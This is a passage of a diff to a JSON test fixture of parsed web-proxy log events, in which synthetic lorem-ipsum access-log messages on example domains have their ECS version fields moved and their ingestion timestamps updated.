"2021-06-08T12:14:42.230294800Z" + "ingested": "2021-12-14T14:55:10.058077891Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.173.222.131 918 [11/Jul/2017:2:45:07 ori] \"TRACE https://www5.example.net/rum/eataevi.html?ulla=iqu#oin hil\" 10.211.234.224 uiadol Duisa \"lupta\" aUt boNem 5564 \"https://api.example.org/maveni/onevo.htm?liquaUte=alorum#obeataev\" \"Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230298200Z" + "ingested": "2021-12-14T14:55:10.058078263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.11.83.126 6581 [25/Jul/2017:9:47:41 naaliq] \"PROPFIND https://mail.example.net/osquir/mod.txt?fugitse=imad#tinvolup tsed\" 10.0.157.225 itam atu \"lloin\" remipsum tempor 1282 \"https://www5.example.net/incidid/rure.htm?edquian=loremeu#aturve\" \"Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230301600Z" + "ingested": "2021-12-14T14:55:10.058078653Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.228.77.21 6889 [08/Aug/2017:4:50:15 lamc] \"PUT https://api.example.com/asper/umq.txt?itasper=uae#mve uia\" 10.92.237.93 mad onse \"redol\" gnaa mod 5107 \"https://www5.example.com/toditaut/voluptat.htm?strumex=eprehend#asnu\" \"Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230305100Z" + "ingested": "2021-12-14T14:55:10.058079068Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.102.215.23 3665 [22/Aug/2017:11:52:50 esseq] \"POST https://www5.example.net/quatD/isqua.jpg?oloreseo=iruredol#veniamqu licaboN\" 10.20.28.92 econs ntexpl \"dunt\" litsedq nderiti 409 \"https://api.example.com/Cic/olorema.txt?iscive=quasiar#aeab\" \"Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230308700Z" + "ingested": "2021-12-14T14:55:10.058079438Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.45.28.159 5627 [06/Sep/2017:6:55:24 ree] \"NONE https://api.example.net/ation/luptas.html?iatqu=lorsi#repreh plic\" 10.17.87.79 tetur tionula \"ritqu\" ecatcupi uamei 4595 \"https://www5.example.com/onse/olorem.gif?duntutla=ntium#iration\" \"Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230312Z" + "ingested": "2021-12-14T14:55:10.058079809Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.177.238.45 5137 [20/Sep/2017:1:57:58 ssusci] \"DELETE https://internal.example.com/mpo/unte.jpg?ueipsa=scipitl#eumi quasiarc\" 10.189.94.51 tetura rsp \"oluptat\" metco acom 5704 \"https://api.example.com/tem/exeacomm.txt?taliqui=mides#ciun\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230315700Z" + "ingested": "2021-12-14T14:55:10.058080180Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.46.77.76 5169 [04/Oct/2017:9:00:32 anim] 
\"GET https://www.example.org/uov/quaeab.jpg?moles=dipiscin#olup aco\" 10.101.85.169 natu liquid \"enim\" Finibus radi 5697 \"https://example.com/taed/umdolo.html?rroqu=dquiaco#nibus\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 YaBrowser/20.3.0.2221 Yowser/2.5 Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230319900Z" + "ingested": "2021-12-14T14:55:10.058080547Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.24.54.129 77 [19/Oct/2017:4:03:07 eprehend] \"HEAD https://example.net/edolo/ugiatquo.jpg?eosquira=pta#snos orsi\" 10.231.7.209 lorsita eavol \"osamnis\" temaccu scipitl 1247 \"https://www5.example.org/caboNem/urExcept.txt?litesseq=atcupida#tessequa\" \"Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36\" block", "event": { - "ingested": "2021-06-08T12:14:42.230323300Z" + "ingested": "2021-12-14T14:55:10.058080915Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.121.163.5 7803 [02/Nov/2017:11:05:41 redol] \"CONNECT https://api.example.org/isci/dolor.htm?orinrep=quiavol#nrepreh ratv\" 10.77.129.175 tali BCS \"qui\" ugiatquo incidid 2617 \"https://www.example.com/sBonor/fugits.jpg?amc=vol#admi\" \"Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230326800Z" + "ingested": "2021-12-14T14:55:10.058081284Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.51.236.148 329 [16/Nov/2017:6:08:15 adol] \"PROPFIND https://mail.example.com/roide/tem.gif?rerepre=nculpaq#culpaqui tvolup\" 10.116.146.114 col obea \"emp\" 
agnaaliq est 1444 \"https://www.example.com/inculp/onofd.gif?umdolors=dolori#asperna\" \"Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230330200Z" + "ingested": "2021-12-14T14:55:10.058081648Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.244.108.135 6997 [01/Dec/2017:1:10:49 ume] \"NONE https://internal.example.net/rautod/olest.jpg?lapar=ritati#edquia itesse\" 10.217.222.99 ame amvolu \"mip\" tion tobeatae 2512 \"https://api.example.com/iqua/luptat.txt?oremqu=uradi#velitsed\" \"Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90\" block", "event": { - "ingested": "2021-06-08T12:14:42.230334Z" + "ingested": "2021-12-14T14:55:10.058082023Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.4.69.152 3833 [15/Dec/2017:8:13:24 scivel] \"PUT https://api.example.org/iusmodt/enim.txt?aquio=ersp#iame orroquis\" 10.150.198.112 ntmoll mexer \"estla\" uipexe abor 1370 \"https://www.example.net/remips/illoi.jpg?abori=uisnostr#reetdol\" \"Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10\" block", "event": { - "ingested": "2021-06-08T12:14:42.230337700Z" + "ingested": "2021-12-14T14:55:10.058082402Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.45.114.111 357 [29/Dec/2017:3:15:58 olup] \"POST https://example.org/abillo/undeom.html?oraincid=quaer#eetdo 
tlab\" 10.45.54.107 seddoeiu nse \"aali\" edictasu mdolors 7490 \"https://www5.example.org/atis/atDuis.txt?nisiut=rumwri#velill\" \"Mozilla/5.0 (Linux; Android 10; SM-A715F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/83.0.4103.83 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/266.0.0.16.117;]\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230341300Z" + "ingested": "2021-12-14T14:55:10.058082790Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.49.242.174 4078 [12/Jan/2018:10:18:32 tat] \"TRACE https://mail.example.net/uam/orumSec.jpg?isnisiu=suntincu#sse venia\" 10.205.28.24 oeni untutlab \"tvolup\" consecte pteurs 742 \"https://www5.example.net/ons/tiaecon.html?unt=tass#tiumdol\" \"Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230345300Z" + "ingested": "2021-12-14T14:55:10.058083331Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.17.202.219 487 [27/Jan/2018:5:21:06 iame] \"HEAD https://www5.example.org/umiurer/rere.txt?mnisi=usmo#iamea imaveni\" 10.183.223.149 cor odoco \"oin\" itseddoe elites 6366 \"https://mail.example.com/eursinto/litesse.html?licaboNe=tautfug#giatquov\" \"Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230350100Z" + "ingested": "2021-12-14T14:55:10.058083707Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.81.140.173 7623 [10/Feb/2018:12:23:41 itae] \"MOVE 
https://internal.example.net/atnula/ditautf.jpg?iquidex=olup#remipsu tan\" 10.88.172.222 doconse etdol \"dolorsi\" nturmag tura 6695 \"https://internal.example.org/totam/ntoccae.htm?idunt=atqu#naturau\" \"mobmail android 2.1.3.3150\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230354200Z" + "ingested": "2021-12-14T14:55:10.058084113Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.162.129.196 4247 [24/Feb/2018:7:26:15 snisi] \"OPTIONS https://api.example.net/uscip/umS.txt?quiacons=uisa#xeacommo Cicero\" 10.247.53.179 issu identsu \"piscivel\" hend eacommo 6835 \"https://example.com/osquira/umd.gif?scipi=tur#acon\" \"mobmail android 2.1.3.3150\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230358100Z" + "ingested": "2021-12-14T14:55:10.058084483Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.110.86.230 536 [11/Mar/2018:2:28:49 eFini] \"UNLOCK https://mail.example.com/mrema/ullamc.txt?eufug=roquisq#temporai uido\" 10.172.148.223 snulap enimadm \"stenatu\" upta atc 3066 \"https://www5.example.net/asnulap/ipi.htm?orissu=fic#sBon\" \"Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230361900Z" + "ingested": "2021-12-14T14:55:10.058084861Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.93.159.170 3481 [25/Mar/2018:9:31:24 emullam] \"GET https://www5.example.com/isau/itinvol.txt?saquaea=ons#orsitam modico\" 10.232.19.43 porinc riame \"riat\" sseq eriam 729 \"https://internal.example.net/imve/essequam.gif?urQuis=etcon#onsequu\" \"Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230366Z" + "ingested": "2021-12-14T14:55:10.058085229Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.207.97.192 973 [08/Apr/2018:4:33:58 emp] \"ICP_QUERY https://api.example.net/veli/venia.htm?etdolor=uat#onemulla riaturEx\" 10.55.55.72 nculp asp \"eacom\" mag gelitse 2007 \"https://example.net/lab/llumq.htm?tetura=rumet#uptasnul\" \"Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230370Z" + "ingested": "2021-12-14T14:55:10.058085755Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.41.156.88 203 [22/Apr/2018:11:36:32 oco] \"MOVE https://internal.example.net/ainci/osqu.jpg?sus=imavenia#expli ugiat\" 10.89.73.240 orem ntorever \"pisciv\" fugiatqu seos 5561 \"https://www5.example.net/elillum/veleumi.gif?tvol=oluptate#lit\" \"Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230373800Z" + "ingested": "2021-12-14T14:55:10.058086120Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.54.44.231 5292 [07/May/2018:6:39:06 aco] \"CONNECT https://www.example.org/runtm/eturadip.htm?psumd=oloree#seos rios\" 10.101.183.86 mvenia mcorpo \"ntexpl\" abor oreverit 6451 \"https://internal.example.net/tat/eufugia.htm?tau=fficia#est\" \"Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10\" 
allow", "event": { - "ingested": "2021-06-08T12:14:42.230377300Z" + "ingested": "2021-12-14T14:55:10.058086523Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.181.177.74 3378 [21/May/2018:1:41:41 itsedd] \"LOCK https://internal.example.org/liquipex/uisnos.html?ventor=lupt#umwri odoc\" 10.130.150.189 oreeu nvo \"iamqui\" tassita colabori 1223 \"https://www.example.net/lpa/isn.htm?iat=ffic#siuta\" \"Mozilla/5.0 (Linux; Android 9; U307AS) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230381700Z" + "ingested": "2021-12-14T14:55:10.058086887Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.76.220.3 2492 [04/Jun/2018:8:44:15 serrorsi] \"GET https://api.example.org/mquisnos/lore.txt?siar=isn#veniamq lup\" 10.83.130.95 ipitlabo userror \"eacommo\" nderi liqua 7030 \"https://api.example.net/henderit/remq.jpg?voluptas=velill#rspic\" \"Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230386500Z" + "ingested": "2021-12-14T14:55:10.058087248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.219.245.58 7073 [19/Jun/2018:3:46:49 snisiut] \"COPY https://www.example.com/quas/occaeca.htm?ender=dico#uptatem upt\" 10.166.160.217 olor radip \"rchitect\" Dui iameaqu 2429 \"https://api.example.com/asnulap/yCiceroi.jpg?ender=inc#tect\" \"Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230390400Z" + "ingested": "2021-12-14T14:55:10.058087616Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": 
[ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.121.121.153 723 [03/Jul/2018:10:49:23 smoditem] \"UNLOCK https://www5.example.org/uidolo/umdolore.jpg?oquisq=abori#sit catcu\" 10.183.243.246 amni tatio \"amquisno\" modoc magnam 3267 \"https://example.com/idatat/onev.html?lesti=oreseo#reprehen\" \"Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230393900Z" + "ingested": "2021-12-14T14:55:10.058087983Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.54.5.47 1585 [17/Jul/2018:5:51:58 mmodi] \"OPTIONS https://internal.example.net/eniamqu/inimav.htm?imadm=uta#tisu remagnam\" 10.202.224.209 iusmodit aturv \"ectetura\" obeataev umf 3141 \"https://www.example.com/quaeabil/emip.htm?urExc=tDuis#iqu\" \"Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230399700Z" + "ingested": "2021-12-14T14:55:10.058088344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.72.99.69 3172 [01/Aug/2018:12:54:32 oremeumf] \"PROPFIND https://mail.example.net/sintocca/mipsumqu.htm?tnulapar=ico#giatquo lors\" 10.170.234.233 accus uatu \"mquis\" lab uido 2046 \"https://mail.example.com/tena/aal.jpg?CSedu=mcol#lup\" \"Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230403300Z" + "ingested": "2021-12-14T14:55:10.058088713Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "10.245.240.47 4017 [15/Aug/2018:7:57:06 itaedict] \"DELETE https://api.example.org/rep/remap.html?siarc=fdeFin#eleumi edic\" 10.142.130.227 olabori odic \"iuta\" liquaUte scivelit 7795 \"https://internal.example.net/scipit/lloinve.htm?evolup=rvelil#isiutali\" \"Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91\" allow", "event": { - "ingested": "2021-06-08T12:14:42.230406900Z" + "ingested": "2021-12-14T14:55:10.058089127Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.62.188.193 4104 [29/Aug/2018:2:59:40 atu] \"DELETE https://api.example.net/eturad/tDuis.htm?enimadmi=tateveli#osa mini\" 10.61.110.7 oremque quaU \"ufugi\" cin tmo 508 \"https://example.com/oremip/its.jpg?iavol=natuserr#ostrudex\" \"Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) yahoo.adquality.lwd.desktop/1591143192-10\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230410300Z" + "ingested": "2021-12-14T14:55:10.058089494Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.172.139.78 6533 [12/Sep/2018:10:02:15 lamco] \"COPY https://www.example.net/hender/ptatemU.htm?mquisnos=tnulapa#madmi tlabore\" 10.68.198.188 doeiu onsectet \"dentsunt\" inea animid 2119 \"https://mail.example.net/onnumqua/quioff.html?upt=atatnonp#nvol\" \"Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61\" block", "event": { - "ingested": "2021-06-08T12:14:42.230413900Z" + "ingested": "2021-12-14T14:55:10.058089882Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.172.47.7 2805 [27/Sep/2018:5:04:49 midest] \"CONNECT https://www.example.org/iduntutl/rsitam.htm?ntor=oinBCSed#oid rchit\" 10.169.63.169 ariat midestl \"quatu\" avolu teturad 3465 \"https://api.example.net/iquaUten/prehende.gif?rpo=velites#nonpro\" \"Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16\" block", "event": { - "ingested": "2021-06-08T12:14:42.230417300Z" + "ingested": "2021-12-14T14:55:10.058090255Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.32.98.109 5012 [11/Oct/2018:12:07:23 dexercit] \"PURGE https://example.org/itessequ/porissu.html?uip=ectobea#dat aUtenima\" 10.62.10.137 eeufugi deomnisi \"olupta\" oll laboree 3880 \"https://api.example.org/cupidata/stiaecon.htm?rsint=itl#ttenb\" \"Mozilla/5.0 (Linux; Android 9; LG-US998) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" cancel", "event": { - "ingested": "2021-06-08T12:14:42.230421100Z" + "ingested": "2021-12-14T14:55:10.058090622Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.176.62.146 5945 [25/Oct/2018:7:09:57 lors] \"COPY https://api.example.net/enimad/tis.txt?mipsumq=ident#nimide quelaud\" 10.255.40.12 rro oeiusmo \"nimv\" emeu tatemac 5192 \"https://www5.example.com/teursint/etMa.gif?lamcolab=ceroinB#umqui\" \"Mozilla/5.0 (Linux; Android 6.0; U20 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.147 Mobile Safari/537.36 YaApp_Android/10.90 YaSearchBrowser/10.90\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230424600Z" + "ingested": "2021-12-14T14:55:10.058090999Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.194.198.46 3387 
[09/Nov/2018:2:12:32 cta] \"GET https://api.example.org/taspe/yCiceroi.htm?cti=ommodoc#nse mveniam\" tuser 2694 \"https://internal.example.com/tlaboru/aeabillo.txt?equuntu=quamni#turveli\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]\" deny 10.88.98.31 rured 105.243000", "event": { - "ingested": "2021-06-08T12:14:42.230427800Z" + "ingested": "2021-12-14T14:55:10.058091369Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.5.49.20 7503 [23/Nov/2018:9:15:06 macc] \"OPTIONS https://example.com/beat/rro.jpg?uisau=qua#iarchite emsequi\" 10.1.27.133 edqu tationu \"gnaaliq\" olore ntutlab 6881 \"https://www5.example.com/gnama/esciun.html?ratvo=ntutl#volupt\" \"Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30\" block", "event": { - "ingested": "2021-06-08T12:14:42.230431200Z" + "ingested": "2021-12-14T14:55:10.058091745Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.11.73.145 6972 [07/Dec/2018:4:17:40 uisautem] \"POST https://www5.example.org/loremq/turmagni.txt?emUtenim=ende#dexea aco\" 10.70.244.155 olorsi caboNemo \"uptas\" temaccus ons 2160 \"https://internal.example.com/ctetur/mvolupta.html?oreeu=mea#ssec\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]\" accept", "event": { - "ingested": 
"2021-06-08T12:14:42.230434500Z" + "ingested": "2021-12-14T14:55:10.058092108Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.204.214.98 985 [21/Dec/2018:11:20:14 equ] \"PURGE https://www5.example.net/deomnisi/ddoe.txt?oremi=ectobeat#ecte abo\" 10.121.80.158 boriosa cillumdo \"ditau\" moenimip uames 7663 \"https://internal.example.com/lor/oreeu.html?eturadip=nost#atus\" \"Mozilla/5.0 (Linux; Android 7.0; SM-S337TL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36\" accept", "event": { - "ingested": "2021-06-08T12:14:42.230438200Z" + "ingested": "2021-12-14T14:55:10.058092587Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.74.115.33 4006 [05/Jan/2019:6:22:49 nsequat] \"PURGE https://api.example.net/tiset/sci.jpg?rauto=doloreeu#lors eumfu\" 10.139.151.19 eumf roquisq \"uasi\" maveniam uis 5533 \"https://www.example.com/imi/animi.htm?ama=tatnonp#ntiumt\" \"Mozilla/5.0 (Linux; Android 10; SM-A305FN Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.96 Mobile Safari/537.36 YandexSearch/8.10 YandexSearchBrowser/8.10\" block", "event": { - "ingested": "2021-06-08T12:14:42.230441700Z" + "ingested": "2021-12-14T14:55:10.058092950Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "10.191.220.1 6454 [19/Jan/2019:1:25:23 ctetura] \"DELETE https://api.example.net/tDuisau/aturve.htm?tper=pisciv#tconsect pariat\" 10.242.48.203 ctobeat isi \"idexeac\" ntu tdolo 3872 \"https://mail.example.com/olupt/ola.jpg?etquasia=qua#adm\" \"Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36\" deny", "event": { - "ingested": "2021-06-08T12:14:42.230445100Z" + "ingested": 
